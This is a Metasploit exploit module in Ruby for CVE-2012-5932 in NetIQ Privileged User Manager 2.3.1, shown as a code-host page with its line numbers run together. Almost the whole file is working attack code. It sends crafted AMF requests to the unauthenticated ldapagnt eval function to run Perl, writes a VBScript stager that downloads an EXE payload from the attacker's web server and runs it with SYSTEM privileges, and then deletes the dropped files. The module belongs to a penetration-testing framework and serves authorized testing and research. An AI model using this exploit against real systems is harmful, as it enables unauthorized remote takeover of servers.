Path: blob/master/modules/exploits/windows/novell/netiq_pum_eval.rb
19669 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::HttpServer9include Msf::Exploit::Remote::HttpClient10include Msf::Exploit::EXE11include Msf::Exploit::FileDropper1213def initialize(info = {})14super(15update_info(16info,17'Name' => 'NetIQ Privileged User Manager 2.3.1 ldapagnt_eval() Remote Perl Code Execution',18'Description' => %q{19This module abuses a lack of authorization in the NetIQ Privileged User Manager20service (unifid.exe) to execute arbitrary perl code. The problem exists in the21ldapagnt module. The module has been tested successfully on NetIQ PUM 2.3.1 over22Windows 2003 SP2, which allows to execute arbitrary code with SYSTEM privileges.23},24'Author' => [25'rgod', # Vulnerability discovery and PoC26'juan vazquez' # Metasploit module27],28'License' => MSF_LICENSE,29'References' => [30[ 'CVE', '2012-5932' ],31[ 'OSVDB', '87334' ],32[ 'BID', '56539' ],33[ 'EDB', '22738' ]34],35'Payload' => {36'Space' => 2048,37'StackAdjustment' => -350038},39'Platform' => 'win',40'Privileged' => true,41'Targets' => [42['Windows 2003 SP2 / NetIQ Privileged User Manager 2.3.1', {}],43],44'DefaultTarget' => 0,45'DisclosureDate' => '2012-11-15',46'Compat' => {47'Meterpreter' => {48'Commands' => %w[49stdapi_fs_delete_file50stdapi_sys_config_getenv51]52}53},54'Notes' => {55'Reliability' => UNKNOWN_RELIABILITY,56'Stability' => UNKNOWN_STABILITY,57'SideEffects' => UNKNOWN_SIDE_EFFECTS58}59)60)6162register_options(63[64Opt::RPORT(443),65OptBool.new('SSL', [true, 'Use SSL', true]),66OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the VBS payload request', 60])67]68)6970self.needs_cleanup = true71end7273def check74data = fake_login7576print_status("Sending fake login request...")7778res = send_request_cgi(79{80'uri' => '/',81'version' => '1.1',82'method' => 'POST',83'ctype' => "application/x-amf",84'headers' => {85"x-flash-version" => "11,4,402,278"86},87'data' => data,88}89)9091if res and res.body =~ /onResult/ and res.body =~ /Invalid user name or password/ and res.body =~ /2\.3\.1/92return Exploit::CheckCode::Appears93elsif res and res.body =~ /onResult/ and res.body =~ /Invalid user name or password/94return Exploit::CheckCode::Detected95end9697return Exploit::CheckCode::Safe98end99100def on_new_session(session)101if session.type == "meterpreter"102session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")103end104105@dropped_files.delete_if do |file|106win_file = file.gsub("/", "\\\\")107if session.type == "meterpreter"108begin109windir = session.sys.config.getenv('WINDIR')110win_file = "#{windir}\\system32\\#{win_file}"111# Meterpreter should do this automatically as part of112# fs.file.rm(). Until that has been implemented, remove the113# read-only flag with a command.114session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)115session.fs.file.rm(win_file)116print_good("Deleted #{file}")117true118rescue ::Rex::Post::Meterpreter::RequestError119false120end121122end123end124end125126# Handle incoming requests from the target127def on_request_uri(cli, request)128vprint_status("on_request_uri called")129130if (not @exe_data)131print_error("A request came in, but the EXE archive wasn't ready yet!")132return133end134135print_good("Sending the EXE payload to the target...")136send_response(cli, @exe_data)137@exe_sent = true138end139140def lookup_lhost()141# Get the source address142if datastore['SRVHOST'] == '0.0.0.0'143Rex::Socket.source_address('50.50.50.50')144else145datastore['SRVHOST']146end147end148149def fake_login150data = "\x00\x00\x00\x00\x00\x01\x00\x15\x53\x50\x46\x2e\x55\x74" # ..........SPF.Ut151data << "\x69\x6c\x2e\x63\x61\x6c\x6c\x4d\x6f\x64\x75\x6c\x65\x45\x78\x00" # il.callModuleEx.152data << "\x02\x2f\x34\x00\x00\x00\x64\x0a\x00\x00\x00\x01\x03\x00\x03\x70" # ./4...d........p153data << "\x6b\x74\x03\x00\x0b\x43\x72\x65\x64\x65\x6e\x74\x69\x61\x6c\x73" # kt...Credentials154data << "\x03\x00\x04\x6e\x61\x6d\x65\x02\x00\x04\x74\x65\x73\x74\x00\x06" # ...name...test..155data << "\x70\x61\x73\x73\x77\x64\x02\x00\x04\x74\x65\x73\x74\x00\x00\x09" # passwd...test...156data << "\x00\x06\x6d\x65\x74\x68\x6f\x64\x02\x00\x05\x6c\x6f\x67\x69\x6e" # ..method...login157data << "\x00\x06\x6d\x6f\x64\x75\x6c\x65\x02\x00\x04\x61\x75\x74\x68\x00" # ..module...auth.158data << "\x03\x75\x69\x64\x06\x00\x00\x09\x00\x00\x09"; # .uid.......159return data160end161162def exploit163data = fake_login164165print_status("Sending fake login request...")166res = send_request_cgi(167{168'uri' => '/',169'version' => '1.1',170'method' => 'POST',171'ctype' => "application/x-amf",172'headers' => {173"x-flash-version" => "11,4,402,278"174},175'data' => data,176}177)178179if not res or res.code != 200 or res.body !~ /svc(.+)/180fail_with(Failure::Unknown, 'Fake Login failed, svc not identified')181end182183svc = $1184svc_length = svc[1, 2].unpack("n")[0]185svc_name = svc[3, svc_length]186vprint_status("SVC Found: #{svc_name}")187188print_status("Generating the EXE Payload...")189@exe_data = generate_payload_exe190exename = Rex::Text.rand_text_alpha(1 + rand(2))191192print_status("Setting up the Web Service...")193datastore['SSL'] = false194resource_uri = '/' + exename + '.exe'195service_url = "http://#{lookup_lhost}:#{datastore['SRVPORT']}#{resource_uri}"196print_status("Starting up our web service on #{service_url} ...")197start_service({198'Uri' => {199'Proc' => Proc.new { |cli, req|200on_request_uri(cli, req)201},202'Path' => resource_uri203}204})205datastore['SSL'] = true206207# http://scriptjunkie1.wordpress.com/2010/09/27/command-stagers-in-windows/208vbs_stage = Rex::Text.rand_text_alpha(3 + rand(5))209code = "system(\"echo Set F=CreateObject(\\\"Microsoft.XMLHTTP\\\") >%WINDIR%/system32/#{vbs_stage}.vbs\");"210code << "system(\"echo F.Open \\\"GET\\\",\\\"#{service_url}\\\",False >>%WINDIR%/system32/#{vbs_stage}.vbs\");"211code << "system(\"echo F.Send >>%WINDIR%/system32/#{vbs_stage}.vbs\");"212code << "system(\"echo Set IA=CreateObject(\\\"ADODB.Stream\\\") >>%WINDIR%/system32/#{vbs_stage}.vbs\");"213code << "system(\"echo IA.Type=1 >>%WINDIR%/system32/#{vbs_stage}.vbs\");"214code << "system(\"echo IA.Open >>%WINDIR%/system32/#{vbs_stage}.vbs\");"215code << "system(\"echo IA.Write F.responseBody >>%WINDIR%/system32/#{vbs_stage}.vbs\");"216code << "system(\"echo IA.SaveToFile \\\"%WINDIR%\\system32\\#{exename}.exe\\\",2 >>%WINDIR%/system32/#{vbs_stage}.vbs\");"217code << "system(\"echo CreateObject(\\\"WScript.Shell\\\").Run \\\"%WINDIR%\\system32\\#{exename}.exe\\\" >>%WINDIR%/system32/#{vbs_stage}.vbs\");"218code << "system(\"#{vbs_stage}.vbs\");"219register_file_for_cleanup("#{vbs_stage}.vbs")220register_file_for_cleanup("#{exename}.exe")221identity = ""222223data = "\x00\x00\x00\x00\x00\x01"224data << "\x00\x14"225data << "SPF.Util.callModuleA"226data << "\x00\x00"227data << "\x00"228data << "\x00\x02"229data << "\x0a\x0a"230data << "\x00\x00\x00\x01\x03"231data << "\x00\x03"232data << "pkt"233data << "\x03"234data << "\x00\x06"235data << "method"236data << "\x02"237data << "\x00\x04"238data << "eval"239data << "\x00\x06"240data << "module"241data << "\x02"242data << "\x00\x08"243data << "ldapagnt"244data << "\x00\x04"245data << "Eval"246data << "\x03"247data << "\x00\x07"248data << "content"249data << "\x02"250data << [code.length + 4].pack("n")251data << code252data << "\x0a\x0a1;\x0a\x0a1;"253data << "\x00\x00\x09"254data << "\x00\x00\x09"255data << "\x00\x03"256data << "uid"257data << "\x02"258data << [identity.length].pack("n")259data << identity260data << "\x00\x00\x09"261data << "\x00\x08"262data << "svc_name"263data << "\x02"264data << [svc_name.length].pack("n")265data << svc_name266data << "\x00\x00\x09"267268print_status("Sending the eval code request...")269270res = send_request_cgi(271{272'uri' => '/',273'version' => '1.1',274'method' => 'POST',275'ctype' => "application/x-amf",276'headers' => {277"x-flash-version" => "11,4,402,278"278},279'data' => data,280}281)282283if res284fail_with(Failure::Unknown, "There was an unexpected response to the code eval request")285else286print_good("There wasn't a response, but this is the expected behavior...")287end288289# wait for the data to be sent290print_status("Waiting for the victim to request the EXE payload...")291292waited = 0293while (not @exe_sent)294select(nil, nil, nil, 1)295waited += 1296if (waited > datastore['HTTP_DELAY'])297fail_with(Failure::Unknown, "Target didn't request request the EXE payload -- Maybe it cant connect back to us?")298end299end300301print_status("Giving time to the payload to execute...")302select(nil, nil, nil, 20)303end304end305306307